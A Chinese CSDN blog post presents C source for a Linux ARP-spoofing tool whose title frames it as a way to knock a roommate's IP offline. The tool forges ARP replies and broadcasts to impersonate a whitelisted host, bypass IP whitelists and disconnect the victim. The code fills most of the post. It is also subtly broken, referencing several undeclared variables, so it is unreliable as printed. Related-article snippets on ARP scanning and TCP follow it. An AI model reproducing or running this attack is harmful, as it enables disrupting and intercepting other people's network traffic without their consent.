ARP-三方欺骗-打挂你舍友的IP

最新推荐文章于 2024-04-27 22:35:53 发布
最新推荐文章于 2024-04-27 22:35:53 发布
阅读量1.9k 收藏 1
点赞数
文章标签: tcp/ip 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sharenfish/article/details/121728910
版权

好久好久没发过帖子啦

只皆因有些懒

又但了好久的白嫖党···

Arp欺骗搞协议的可能对这一块比较熟悉

也是用了这个特性做了个Arp欺骗的小工具

Linux可运行哈

分为A B C三者
A作为本机
B作为C者的“白名单” (想不到形容词了)
C作为A发起欺骗的目标

作用
1、可突破A者白名单限制
2、可将B者踢下线

只是个demo 大家也可以完善一下哈
比如增加收包
A回应B的请求 做一个协议的截断等等等

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <unistd.h>

//获取本机MAC地址,存入mac数组中,要求传入网卡名字
int getMacAddr(unsigned char mac[], const char name[])
{
    struct ifreq ethinfo;
    int sock_fd;

    if (name == NULL || mac == NULL)
    {
        return -1;
    }

    if ((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("Open Socket");
        return -1;
    }

    strcpy(ethinfo.ifr_name, name);

    if (ioctl(sock_fd, SIOCGIFHWADDR, einfo) < 0)
    {
        perror("Ioctl");
        return -1;
    }
    int i;
    for (i = 0; i < 6; ++i)
    {
        mac[i] = (unsigned char)ethinfo.ifr_hwaddr.sa_data[i];
    }

    close(sock_fd);

    return 1;
}
//构建ARP数据包
//自己的mac 
//目标的mac
//自己的ip 
//目标的ip 
//包类型 
//数据
void packarp(unsigned char *mymac, unsigned char *tarmac, int *myip, int *tarip, char *opcode, char *arppack)
{
    char eth_type[2] = {0x00, 0x01}; //硬件类型,以太网为1
    char por_type[2] = {0x08, 0x00}; //ARP正在使用的上层协议类型,这里是IP协议
    char type[2] = {0x08, 0x06};     //帧类型,0x0806表示ARP
    char eth_length = 6;             //硬件地址长度
    char por_length = 4;             //协议地址长度,这里指IP协议

    memset(arppack, 0, 42);               //清空发送缓存区
    memcpy(arppack, tarmac, 6);           //6个字节表示目标主机的mac地址
    memcpy(arppack + 6, mymac, 6);        //6个字节表示源主机的mac地址
    memcpy(arppack + 12, type, 2);        //帧类型,这里表示ARP
    memcpy(arppack + 14, eth_type, 2);    //硬件地址,这里表示以太网
    memcpy(arppack + 16, por_type, 2);    //ARP正在使用的上层协议
    memcpy(arppack + 18, e_length, 1); //硬件地址长度
    memcpy(arppack + 19, &por_length, 1); //协议地址长度
    memcpy(arppack + 20, opcode, 2);      //标记是ARP还是ARP应答
    memcpy(arppack + 22, mymac, 6);       //发送者MAC地址
    memcpy(arppack + 28, myip, 4);        //发送者IP
    if (!(opcode[0] == 0x00 && opcode[1] == 0x01))
    {
        memcpy(arppack + 32, tarmac, 6); //目标MAC地址
    }
    memcpy(arppack + 38, tarip, 4); //目标IP地址
}
//发送arp包
int sendpcak(int fd, struct sockaddr sock, char *sendarp)
{
    socklen_t len = sizeof(sock);
    if (sendto(fd, sendarp, 42, 0, &sock, len) == 42)
    {
        printf("send arp pcak succeed\n");
    }
    else
    {
        perror("sendto");
        return -1;
    }
    return 1;
}
//接受arp包
int recvpcak(int fd, struct sockaddr sock, char *recvarp)
{
    socklen_t len = sizeof(sock);
    if (recvfrom(fd, recvarp, 42, 0, &sock, &len) == 42)
    {
        printf("recv arp pcak succeed\n");
    }
    else
    {
        perror("recvfrom");
        return -1;
    }
    return 1;
}
//获取本机IP
int getipaddr(char *eth_name, char* ip_addr)
{
        int sock;
        struct sockaddr_in sin;
        struct ifreq ifr;
        sock = socket(AF_INET, SOCK_DGRAM, 0);
        if (sock == -1)
        {
                perror("socket");
                return -1;                
        }

        strncpy(ifr.ifr_name, eth_name, IFNAMSIZ);
        ifr.ifr_name[IFNAMSIZ - 1] = 0;
        if (ioctl(sock, SIOCGIFADDR, &ifr) < 0)
        {
                perror("ioctl");
                return -1;
        }

        memcpy(&sin, &ifr.ifr_addr, sizeof(sin));
        strcpy(ip_addr, inet_ntoa(sin.sin_addr));        
        return 1;
}
//网卡名字 
//本机IP 
//要伪装的IP 
//要欺骗的IP
int main(int argc, char *argv[])
{

    if (argc < 2)
    {
        printf("Please enter parameters\t\n");
        printf("parameter 1: [ethname]  parameter 2:[simulateip]  variable parameter 3: [dstip]\t\n");
        printf("example 1:./xxx eth1 192.168.74.119 192.168.74.111\t\nexample 2:./xxx eth1 192.168.74.119\t\n");
        return -1;
    }

    unsigned char mymac[6] = {0};                                   //自己的MAC地址
    unsigned char simulatemac[6] = {0};                             //被伪装者MAC地址
    unsigned char dstmac[6] = {0};                                  // 被欺骗者MAC地址
    unsigned char tarmac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; //广播的MAC地址
    char send_simulatearp[42] = {0};                                //被伪装的发送ARP包
    char send_simulatearpALL[42] = {0};      //被伪装的发送广播ARP包
    char send_dstarp[42] = {0};              //被欺骗的发送ARP包
    char send_dstarpALL[42] = {0};           //被欺骗的发送广播ARP包
    int simulateip, myip, dstip, sock_fd, Flag,fakemyip;
    char opcode[2] = {0x00, 0x01};         //请求标识
    char opcode_respond[2] = {0x00, 0x02}; //回应标识
        char ip_temp[64]={0};
        char ip_temp1[64]={0};
    struct sockaddr addr;
    memset(&addr, 0, sizeof(addr));
    strncpy(addr.sa_data, argv[1], sizeof(addr.sa_data));
        printf("ethname:%s\n",argv[1]);
        printf("simulateip:%s\n",argv[2]);
    if (argc == 4)
    {
                printf("desip:%s\n",argv[3]);
        dstip = inet_addr(argv[3]);
        Flag = 1;
    }
        if(!getipaddr(argv[1],ip_temp))
        {
                printf("get ip fail");
                return -1;
        }

        strcpy(ip_temp1, ip_temp);
        int templen = strlen(ip_temp1)-1;
        if (ip_temp1[templen] == '4')
    {
        ip_temp1[templen] = '3';
    }
    else
    {
        ip_temp1[templen] = '4';
    }
        fakemyip=inet_addr(ip_temp1);
        myip = inet_addr(ip_temp);
    simulateip = inet_addr(argv[2]);
    //获取本机MAC地址
    if (getMacAddr(mymac, argv[1]) < 0)
    {
        printf("get MAC fail\n");
        return -1;
    }
    int i;
    printf("my MAC:");
    for (i = 0; i < 6; i++)
    {
        printf("%02x ", mymac[i]);
    }
    printf("\n");
    packarp(mymac, tarmac, &fakemyip, &simulateip, opcode, send_arpsimulatearp); //拼接发送给被伪装者IP的arp包 先用自己假IP给他通信 要不然获取它的mac地址可能获取不到
    if (Flag)
    {
        packarp(mymac, tarmac, &myip, &dstip, opcode, send_arpdst); //拼接发送给被欺骗者IP的arp包 这个就无所谓了
    }
    if ((sock_fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0)
    {
        perror("Open Socket");
        return EXIT_FAILURE;
    }
    //获取需要的mac地址
        while(1)
        {
                sendpcak(sock_fd, addr, send_arpsimulatearp);
                usleep(50);
        recvpcak(sock_fd, addr, recv_arpsimulatearp);
        if (!memcmp((void *)recv_arpsimulatearp + 28, (void *)send_arpsimulatearp + 38, 4))
        {
            memcpy(simulatemac, recv_arpsimulatearp + 22, 6);
            printf("get simulate mac succeed\n");
            printf("simulate mac:");
            int i;
            for (i = 0; i < 6; i++)
            {
                printf("%02x ", simulatemac[i]);
            }
            printf("\n");
            break;
        }
        }
        sleep(3);
    while (Flag)
    {

                sendpcak(sock_fd, addr, send_arpdst);
                usleep(50);
                recvpcak(sock_fd, addr, recv_arpdst);
                if (!memcmp((void *)recv_arpdst + 28, (void *)send_arpdst + 38, 4))
                {
                        memcpy(dstmac, recv_arpdst + 22, 6);
                        printf("get dst mac succeed\n");
                        printf("dst mac:");
                        int i;
                        for (i = 0; i < 6; i++)
                        {
                                printf("%02x ", dstmac[i]);
                        }
                        printf("\n");
                        break;
                }
    }

    if (Flag)
    {
        packarp(mymac, dstmac, &simulateip, &dstip, opcode_respond, send_dstarp);    //把自己包装成 被伪装者的IP  发送给 被欺骗者
        packarp(mymac, tarmac, &simulateip, &dstip, opcode, send_dstarpALL); // 发送给被欺骗者 广播 自己的IP是被伪装者

        packarp(mymac, simulatemac, &dstip, &simulateip, opcode_respond, send_simulatearp); // 把自己包装成 被欺骗者的IP 发送给 被伪装者
        packarp(mymac, tarmac, &dstip, &simulateip, opcode, send_simulatearpALL);   // 广播 自己是 被伪装者

    }
    else
    {
        packarp(mymac, simulatemac, &simulateip, &myip, opcode, send_simulatearp_1);
    }
        printf("------ official start ------\t\n");
    while (1)
    {

        if (Flag)
        {
            sendpcak(sock_fd, addr, send_dstarp);
                        usleep(200);
            sendpcak(sock_fd, addr, send_dstarpALL);
                        usleep(200);
                        sendpcak(sock_fd, addr, send_simulatearp);
                        usleep(200);
                        sendpcak(sock_fd, addr, send_simulatearpALL);
                        sleep(25);

        }
        else
        {
            sendpcak(sock_fd, addr, send_simulatearp_1);
            usleep(200);
            recvpcak(sock_fd, addr, recv_simulatearp);
                        sleep(25);
        }

    }

    close(sock_fd);

    return EXIT_SUCCESS;
}
飞天的大鹅
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
arp-scan-1.9.tar.gz
03-29
linux操作系统下,检测网络中的冲突的ip地址对应的mac地址,本工具为源码包,安装方法...tar -xzvf arp-scan-1.9.tar.gz cd arp-scan-1.9 ./autoreconf --install ./configure make && make check && make install
kali arp-scan网络扫描工具 扫描局域网ip地址
有勇气的牛排博客
07-21 5136
1 arp-scan 简介 arp-scan 是一款轻量级的arp扫描工具,会解析mac地址,就是想局域网中所有可能的ip地址发出arp请求包,如果得到arp回应,就证明了局域网中某天主机使用了该ip。 对于目标主机可以指定IP地址or主机名,可以是网段,指定一个地址范围、指定主机和子网掩码。 2 安装 2.1centos 运行git clone https://github.com/royhills/arp-scan.git获取最新项目源码 运行cd arp-scan进入源码目录 运行autorecon
网络攻防实战--ARP欺骗
热门推荐
vaeloverforever的博客
11-26 5万+
二、实验环境(实验设备) 硬件:微型计算机 软件: kali linux下的arpspoof工具和driftnet工具   三、实验原理及内容以及实验小结 ㈠ ARP欺骗 ⑴利用arpspoof工具和driftnet工具的arp欺骗实验 ①实验原理     1.ARP协议:ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的...
cmd查看局域网所有IP信息 arp -a(ARP命令介绍)
玉米君的博客
08-14 5万+
首先让我们了解下什么是ARP ARP(地址解析协议) 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,
Kali Arp-Scan(ARP 扫描和指纹识别工具)
董哥的黑板报
09-20 4820
一、Arp-Scan简介 arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具允许用户定制ARP包,构建非标准数据包。同时,该工具会自动解析Mac地址,给出MAC对应的硬件厂商,帮助用户确认目标 Arp-Scan可以做到这些: 使用一个可以配置的输出带宽或者...
ip-arp
03-21
ip-arp 这是通过arpip scan扫描对象的活动轨迹的程序。未来可能整合到蓝牙中,加上蓝牙检测路过的所有人的MAC地址,做一个Mac地址:经纬度:日期时间的数据库。现在是通过tg机器人的方式自动通知一些人的设备上下...
window下可用的arp-ping工具
01-03
window下可用的arp-ping工具
ARP.zip_C++ arp -a_arp协议
09-22
ARP 协议 的C++程序实现 可以获取活动主机的物理地址
ArpSpoof-arp欺骗.rar
04-03
arp欺骗工具,windows系统使用
TCP/IP协议族中的TCP(二):解析其关键特性与机制
希望自己从编程小白变成大佬
04-27 851
接收端(相当于超市老板)在收到数据包后,并不立即发送ACK确认报文(相当于告诉供货员需要多少箱冰红茶),而是等待一段时间,看看是否还有更多的数据包到达,或者根据自身的处理能力来决定是否可以接收更多的数据。这样做的好处是,通过一个报文同时完成了数据的确认和响应的发送,减少了网络中的传输次数,从而提高了网络的整体效率。例如,当接收方处理数据的速度远远跟不上发送方的发送速度时,为了防止数据溢出,接收方可能会将窗口大小调整为0,即告诉发送方暂停发送数据,直到接收方处理完当前数据并准备好接收新数据为止。
tcp客户端向tcp服务器发送json文件,服务器转存为json文件
weixin_51883798的博客
04-25 306
从客户端接收数据--->QByteArray--->QJsonDocument--->QFile--->xxx.json文件。就是根据文件路径--->QFile--->QByteArray--->传递给服务器。
配置IPSSL证书需要几步
u012062803的博客
04-25 528
IPSSL证书是一种数字证书,用于验证网站的身份并建立安全的通信连接。配置IPSSL证书可以有效防止黑客攻击、数据泄露等安全风险,同时也可以提供用户对网站真实性的确认,增加用户对网站的信任感。当然部署SSL证书是不可或缺的一环,我们可以确保信息的传输过程中不会被窃取或篡改,但这并不能防止所有的网络攻击。因此,我们还需要采取其他的手段,如定期更新系统和软件,定期备份数据等,来进一步提高我们的网络安全性。以上几步就是配置IPSSL证书的所有步骤,整个过程其实相当简单,一般的网络管理员都能轻松操作。
IP归属地在互联网行业中的应用
m0_73834612的博客
04-26 569
在电子商务和金融领域,IP归属地也被用于反欺诈和风险控制。例如,如果用户的登录IP地址突然发生跨国或异常变化,系统可能会触发风险提示,要求进行额外的身份验证,以防止欺诈行为的发生。通过分析用户的IP地址,服务提供商可以快速确定用户所在的地理位置,从而提供更贴近用户需求的服务和产品。通过分析恶意IP地址的地理位置信息,安全专家可以迅速定位攻击源,并采取相应的防御措施,保护系统和数据的安全。随着技术的不断进步和数据分析能力的提升,IP归属地将发挥越来越重要的作用,为互联网行业的发展和用户体验提供更多可能性。
SpringCloud系列(13)--Eureka服务名称修改和服务IP显示
m0_64284147的博客
04-24 860
在上一章节中我们把服务提供者做成了集群,而本章节则是一些关于服务信息的配置,这部分知识对集群整体影响不大,不过最好还是掌握,毕竟万一有用到的地方呢。
网络通信协议,UDP和TCP,初步了解
最新发布
wwwithin的博客
04-27 1057
TCP 是一种面向连接的协议,它提供了可靠的、有序的数据流传输服务。TCP 在通信开始之前需要进行握手过程,建立起连接后,它通过序号和确认号来保证数据的可靠性、有序性和完整性。TCP 还实现了流量控制和拥塞控制机制,以确保网络的稳定性和公平性。TCP 适用于对数据可靠性和顺序性要求较高的应用场景,如网页浏览、文件传输和电子邮件。UDP 是一种简单的无连接协议,它提供了数据包的传输服务,但不提供像 TCP 那样的可靠性和错误检测机制。
TCP、UDP客户端
m0_73929315的博客
04-23 1513
int main(int argc, const char *argv[])//argv[1] IP argv[2] 端口号。int main(int argc, const char *argv[])//argv[1] IP argv[2] 端口号。printf("创建报式套接字成功 cfd=%d __%d__\n",cfd,__LINE__);printf("服务器下线 __%d__\n",__LINE__);//填充客户端自身的地址信息,给bind函数绑定使用;//填充服务器的地址信息。
TCP/IP协议族中的TCP(一):解析其关键特性与机制
希望自己从编程小白变成大佬
04-27 1080
TCP(Transmission Control Protocol,传输控制协议)是一种面向连接的、可靠的、基于字节流的传输层通信协议。它是互联网协议族(TCP/IP协议族)中的重要组成部分,旨在适应支持多网络应用的分层协议层次结构。在不同的计算机通信网络的主计算机之间,TCP为各种进程提供可靠的通信服务。TCP协议的重要性在于其保证了数据在传输过程中的可靠性、顺序性和无差错。
网络程序 -- TCP版服务器
sushhsishdgsusk的博客
04-27 1391
对于之前编写的来说,如果只有一个客户端进行连接并通信,是没有问题的,但如果有多个客户端发起连接请求,并尝试进行通信,服务器是无法应对的原因在于为什么客户端B会显示当前已经连接成功?这显然是服务器的问题,与应该交给两个不同的执行流完成,可以使用多进程或者多线程解决,这里先采用多进程的方案fork创建子进程使用fork()函数,它的返回值含义如下ret == 0ret > 0ret < 0子进程创建成功后,会继承父进程的文件描述符表,能轻而易举的获取客户端的socket套接字,从而进行网络通信。
ARP-GUARD安装配置
06-06
ARP-GUARD是一款常用的ARP防护工具,以下是ARP-GUARD的安装配置步骤: 1. 下载ARP-GUARD:从ARP-GUARD官方网站下载安装包,根据操作系统的版本选择对应的安装包。 2. 安装ARP-GUARD:运行安装包,按照提示进行安装。在安装过程中,需要选择安装目录、语言、协议类型等。 3. 配置ARP-GUARD:安装完成后,需要进行配置。打开ARP-GUARD的管理控制台,进行基本配置。比如,设置管理密码、管理端口、SMTP服务器等。 4. 配置网络接口:选择需要进行防护的网络接口,进行配置。比如,设置接口IP地址、子网掩码、网关地址等。 5. 设置ARP欺骗防护规则:设置允许和禁止的IP地址和MAC地址,以及告警规则。可以设置自动阻止ARP欺骗攻击、自动清除ARP缓存等功能。 6. 启动ARP-GUARD:完成配置后,启动ARP-GUARD。 7. 监测和维护:定期检查ARP-GUARD的运行状态,及时采取措施处理告警信息。同时,及时更新防护规则,以保证网络安全。 需要注意的是,ARP-GUARD的具体安装配置步骤可能因版本而异。在安装和配置过程中,需要仔细阅读ARP-GUARD的说明文档,确保正确配置,以保证网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

飞天的大鹅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值